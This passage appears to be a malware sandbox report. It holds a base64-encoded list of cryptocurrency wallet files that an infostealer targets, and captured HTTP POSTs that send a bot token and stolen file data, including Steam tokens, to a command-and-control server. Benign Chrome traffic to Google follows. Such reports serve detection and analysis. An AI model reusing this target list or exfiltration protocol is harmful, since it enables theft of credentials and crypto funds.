Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 9, 2024 02:47:39.261378050 CET	465	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAK Host: 77.220.212.32 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 2d 2d 0d 0a Data Ascii: ------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="message"files------BGDBKKFHIEGDHJKECAAK--
Nov 9, 2024 02:47:39.500756025 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 9, 2024 02:47:39.538002014 CET	563	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHD Host: 77.220.212.32 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 42 46 43 46 49 4a 4a 4b 4b 45 43 41 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKEBFCFIJJKKECAKJEHDContent-Disposition: form-data; name="file"------AKEBFCFIJJKKECAKJEHD--
Nov 9, 2024 02:47:40.017889977 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 9, 2024 02:47:40.139996052 CET	202	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBKECAKFBGCAKECGIEH Host: 77.220.212.32 Content-Length: 98755 Connection: Keep-Alive Cache-Control: no-cache
Nov 9, 2024 02:47:40.976218939 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 9, 2024 02:47:41.028651953 CET	472	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJEGIIEGIDGIDHJDAKF Host: 77.220.212.32 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="message"ybncbhylepme------FHJEGIIEGIDGIDHJDAKF--
Nov 9, 2024 02:47:41.267651081 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 9, 2024 02:47:41.271965981 CET	472	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHC Host: 77.220.212.32 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 2d 2d 0d 0a Data Ascii: ------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KECFCGHIDHCAKEBFCFHC--
Nov 9, 2024 02:47:43.201797962 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49703	216.58.206.36	443	7364	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:14 UTC	595	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-09 01:47:14 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:14 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-AydZw2H5scKl3bePTOvB8w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-09 01:47:14 UTC	112	IN	Data Raw: 31 30 63 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 64 65 61 64 70 6f 6f 6c 20 77 6f 6c 76 65 72 69 6e 65 22 2c 22 76 65 74 65 72 61 6e 73 20 64 61 79 20 6d 69 6c 69 74 61 72 79 20 64 69 73 63 6f 75 6e 74 73 22 2c 22 70 69 74 74 73 62 75 72 67 68 20 73 74 65 65 6c 65 72 73 22 2c 22 70 73 35 20 70 72 6f 20 67 61 6d 65 73 22 2c 22 73 6e Data Ascii: 10c5)]}'["",["deadpool wolverine","veterans day military discounts","pittsburgh steelers","ps5 pro games","sn
2024-11-09 01:47:14 UTC	1378	IN	Data Raw: 6f 77 20 73 74 6f 72 6d 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 20 63 6f 6c 6f 72 61 64 6f 22 2c 22 73 6f 63 69 61 6c 20 73 65 63 75 72 69 74 79 20 62 65 6e 65 66 69 74 73 22 2c 22 64 65 61 72 20 73 61 6e 74 61 20 6d 6f 76 69 65 20 74 72 61 69 6c 65 72 22 2c 22 64 65 61 74 68 20 73 74 72 61 6e 64 69 6e 67 20 78 62 6f 78 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 Data Ascii: ow storm weather forecast colorado","social security benefits","dear santa movie trailer","death stranding xbox"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","
2024-11-09 01:47:14 UTC	1378	IN	Data Raw: 78 79 54 6c 4a 6d 56 7a 42 30 59 54 46 4c 52 6a 4a 6e 61 30 52 69 4d 6b 4d 78 4d 6c 42 7a 56 6c 67 34 4d 6e 67 79 4c 30 46 4c 52 46 56 4a 64 46 42 4d 59 6b 4e 49 56 30 6c 55 55 46 4a 70 53 32 46 6c 56 55 46 73 64 58 6c 53 63 48 56 72 4e 32 64 6f 53 32 56 69 4d 33 52 70 4f 56 4e 4c 56 45 4a 76 63 30 31 52 4e 6c 70 49 52 45 56 6a 53 30 74 30 51 56 56 55 64 57 56 55 59 32 74 75 52 57 78 48 57 47 4e 55 52 58 68 4e 55 31 5a 51 54 45 5a 46 63 57 4a 6a 54 6b 78 72 52 31 64 49 53 6b 56 53 59 57 6c 52 61 45 5a 72 63 55 46 32 57 57 64 72 4f 58 70 7a 54 6c 42 7a 52 44 52 33 4d 6d 5a 55 4e 6c 64 33 61 58 52 32 65 58 42 74 64 48 42 35 56 54 42 48 4d 6b 39 78 4f 45 5a 75 55 30 78 58 4d 55 68 31 62 7a 5a 52 56 44 51 35 4e 7a 4e 33 63 30 5a 33 4c 32 68 70 61 31 45 78 53 Data Ascii: xyTlJmVzB0YTFLRjJna0RiMkMxMlBzVlg4MngyL0FLRFVJdFBMYkNIV0lUUFJpS2FlVUFsdXlScHVrN2doS2ViM3RpOVNLVEJvc01RNlpIREVjS0t0QVVUdWVUY2tuRWxHWGNURXhNU1ZQTEZFcWJjTkxrR1dISkVSYWlRaEZrcUF2WWdrOXpzTlBzRDR3MmZUNld3aXR2eXBtdHB5VTBHMk9xOEZuU0xXMUh1bzZRVDQ5NzN3c0Z3L2hpa1ExS
2024-11-09 01:47:14 UTC	1378	IN	Data Raw: 64 30 56 35 65 45 78 4d 51 32 6c 30 63 46 70 54 51 6a 63 30 53 58 4e 76 54 6c 5a 45 54 56 64 5a 4e 47 64 5a 5a 54 5a 45 56 55 70 68 57 6b 31 6f 65 45 6b 31 55 30 5a 44 65 56 49 33 63 54 4e 49 4d 48 59 35 54 55 52 4a 65 6b 4a 6f 61 55 39 6b 57 48 41 32 62 6e 4a 61 62 55 46 48 51 6e 70 50 4e 7a 52 34 52 57 74 4c 4d 56 46 70 63 45 51 30 59 31 4e 57 54 6e 46 31 61 46 49 34 4d 30 49 31 4e 55 68 49 4f 44 4a 33 54 46 4d 34 65 45 70 6e 65 6a 5a 6e 4e 6a 41 77 63 44 6c 6f 4d 45 4a 55 61 46 6b 72 59 6c 46 55 57 55 74 32 65 47 45 31 53 58 59 33 62 6a 4e 34 56 56 52 44 5a 46 52 47 4c 7a 68 56 61 55 52 51 61 48 42 55 59 30 6c 54 4e 6c 46 7a 53 47 74 6e 54 6e 46 7a 56 54 4e 4b 52 33 64 34 65 47 4e 36 56 44 68 4f 65 54 46 4c 63 47 4a 46 5a 55 6c 56 56 6b 70 48 62 44 51 Data Ascii: d0V5eExMQ2l0cFpTQjc0SXNvTlZETVdZNGdZZTZEVUphWk1oeEk1U0ZDeVI3cTNIMHY5TURJekJoaU9kWHA2bnJabUFHQnpPNzR4RWtLMVFpcEQ0Y1NWTnF1aFI4M0I1NUhIODJ3TFM4eEpnejZnNjAwcDloMEJUaFkrYlFUWUt2eGE1SXY3bjN4VVRDZFRGLzhVaURQaHBUY0lTNlFzSGtnTnFzVTNKR3d4eGN6VDhOeTFLcGJFZUlVVkpHbDQ
2024-11-09 01:47:14 UTC	55	IN	Data Raw: 4e 6b 64 6f 57 56 5a 51 56 54 46 59 53 58 6c 4e 61 55 4a 6f 4e 48 4a 4d 65 6a 6c 49 61 7a 56 31 5a 6e 5a 30 56 55 68 59 4d 6e 52 30 4e 57 56 59 62 45 64 54 61 0d 0a Data Ascii: NkdoWVZQVTFYSXlNaUJoNHJMejlIazV1ZnZ0VUhYMnR0NWVYbEdTa
2024-11-09 01:47:14 UTC	89	IN	Data Raw: 35 33 0d 0a 33 64 42 55 33 42 6c 4e 6e 56 69 61 33 64 4e 65 6c 51 35 4f 57 56 79 4d 58 6f 31 54 44 63 33 5a 47 6f 30 4e 47 49 7a 64 6e 4e 55 54 45 52 42 51 6a 4e 74 63 6e 4a 51 63 33 63 34 59 6b 5a 42 51 32 70 31 65 54 67 33 51 30 46 43 54 46 6f 7a 4b 33 42 79 0d 0a Data Ascii: 533dBU3BlNnVia3dNelQ5OWVyMXo1TDc3ZGo0NGIzdnNUTERBQjNtcnJQc3c4YkZBQ2p1eTg3Q0FCTFozK3By
2024-11-09 01:47:14 UTC	1378	IN	Data Raw: 65 35 66 0d 0a 59 54 4a 79 4e 6a 55 34 64 6a 4d 79 63 58 70 36 65 55 67 7a 65 58 63 7a 52 48 68 31 62 47 46 61 62 55 70 71 4d 6a 46 4b 4e 7a 45 30 5a 56 42 34 64 6d 31 4d 56 32 4e 59 64 6b 68 49 52 47 70 6a 61 6b 70 55 54 6c 4a 73 59 32 6c 4a 61 55 78 4d 54 6a 42 79 61 47 30 32 54 46 52 5a 4d 6a 59 7a 64 7a 6c 75 53 44 42 6c 52 30 35 76 4f 46 55 72 59 54 5a 6b 61 6d 63 33 55 46 70 6d 62 32 4e 76 57 44 5a 48 5a 33 4e 7a 4e 58 70 71 4e 32 38 33 4d 32 4a 46 4e 45 46 42 51 55 55 79 61 32 78 46 55 56 5a 53 57 57 68 61 56 6c 68 44 56 6d 56 71 55 30 4a 42 62 56 49 7a 54 30 64 52 52 57 68 44 5a 30 46 52 52 55 46 76 4e 6d 46 6c 51 56 52 6b 62 6d 46 6e 4e 7a 5a 71 5a 32 31 36 63 58 6f 72 4c 7a 6b 72 65 6d 5a 6b 52 47 51 77 52 55 6f 77 4e 6a 63 79 4f 44 42 4f 56 6a Data Ascii: e5fYTJyNjU4djMycXp6eUgzeXczRHh1bGFabUpqMjFKNzE0ZVB4dm1MV2NYdkhIRGpjakpUTlJsY2lJaUxMTjByaG02TFRZMjYzdzluSDBlR05vOFUrYTZkamc3UFpmb2NvWDZHZ3NzNXpqN283M2JFNEFBQUUya2xFUVZSWWhaVlhDVmVqU0JBbVIzT0dRRWhDZ0FRRUFvNmFlQVRkbmFnNzZqZ216cXorLzkremZkRGQwRUowNjcyODBOVj
2024-11-09 01:47:14 UTC	1378	IN	Data Raw: 57 4e 44 64 55 46 73 59 6e 68 69 5a 57 5a 4e 62 56 68 79 53 7a 41 33 5a 30 74 4b 61 32 35 4b 56 57 39 7a 55 31 4a 30 61 58 64 53 57 45 68 79 4d 7a 5a 7a 64 56 46 74 4d 6b 35 4e 55 6b 39 69 52 44 42 35 4e 31 70 6a 65 55 4a 30 55 55 67 76 5a 57 74 36 4e 47 4e 34 54 45 6f 72 53 58 64 30 62 56 46 35 63 45 34 79 4b 32 5a 4d 52 47 38 35 4d 6d 78 4f 4e 48 6c 70 5a 31 6c 72 61 45 4a 56 65 6e 56 72 64 45 67 72 62 46 51 7a 5a 46 68 4f 56 48 70 31 53 31 4e 43 52 6e 5a 7a 5a 6b 59 79 52 46 70 4d 64 6d 4a 78 63 32 68 4f 5a 46 46 33 63 46 52 57 62 7a 67 31 55 30 64 55 59 7a 42 31 5a 56 68 4a 4d 33 4a 71 54 46 42 57 64 6a 67 33 52 69 38 34 57 56 6c 30 53 58 42 72 4d 45 35 4f 4e 6c 49 32 55 69 74 59 4d 47 55 35 62 44 46 74 57 45 78 75 63 58 6c 31 64 55 74 42 4e 45 4e 68 Data Ascii: WNDdUFsYnhiZWZNbVhySzA3Z0tKa25KVW9zU1J0aXdSWEhyMzZzdVFtMk5NUk9iRDB5N1pjeUJ0UUgvZWt6NGN4TEorSXd0bVF5cE4yK2ZMRG85MmxONHlpZ1lraEJVenVrdEgrbFQzZFhOVHp1S1NCRnZzZkYyRFpMdmJxc2hOZFF3cFRWbzg1U0dUYzB1ZVhJM3JqTFBWdjg3Ri84WVl0SXBrME5ONlI2UitYMGU5bDFtWExucXl1dUtBNENh
2024-11-09 01:47:14 UTC	930	IN	Data Raw: 42 51 56 4a 44 51 55 31 42 51 55 46 43 59 56 70 57 63 53 74 42 51 55 46 42 55 45 5a 43 54 56 5a 46 57 43 38 76 4c 79 39 49 65 44 68 6d 63 7a 64 50 65 6b 31 36 54 58 70 45 64 7a 68 51 55 48 6f 34 4c 32 6b 30 64 55 78 58 4d 58 52 68 4e 33 55 33 64 6a 51 72 55 47 6b 30 64 55 78 70 64 58 4a 78 4e 33 59 33 4b 79 38 34 4c 31 42 36 4d 44 6c 51 56 48 41 32 5a 57 31 58 62 48 42 69 59 7a 4e 4f 65 55 35 71 57 54 4a 6b 62 6c 6f 79 4e 45 52 77 5a 57 78 42 51 55 46 42 62 30 56 73 52 56 46 57 55 54 52 71 5a 54 4a 53 55 33 63 33 52 45 31 42 61 45 56 74 55 55 52 34 54 44 49 32 59 7a 6c 32 4e 54 4e 4d 55 6b 46 77 61 32 52 77 54 6e 56 78 65 6d 46 58 55 58 6b 79 51 6b 45 34 59 6d 6c 51 4e 54 59 78 4f 56 4e 52 54 45 64 53 56 6e 5a 35 62 6b 31 54 62 54 4e 47 51 57 64 6f 57 45 Data Ascii: BQVJDQU1BQUFCYVpWcStBQUFBUEZCTVZFWC8vLy9IeDhmczdPek16TXpEdzhQUHo4L2k0dUxXMXRhN3U3djQrUGk0dUxpdXJxN3Y3Ky84L1B6MDlQVHA2ZW1XbHBiYzNOeU5qWTJkbloyNERwZWxBQUFBb0VsRVFWUTRqZTJSU3c3RE1BaEVtUUR4TDI2Yzl2NTNMUkFwa2RwTnVxemFXUXkyQkE4YmlQNTYxOVNRTEdSVnZ5bk1TbTNGQWdoWE
2024-11-09 01:47:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49706	216.58.206.36	443	7364	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:15 UTC	498	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-09 01:47:15 UTC	1042	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 09 Nov 2024 01:47:15 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-09 01:47:15 UTC	336	IN	Data Raw: 32 33 31 61 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 231a)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
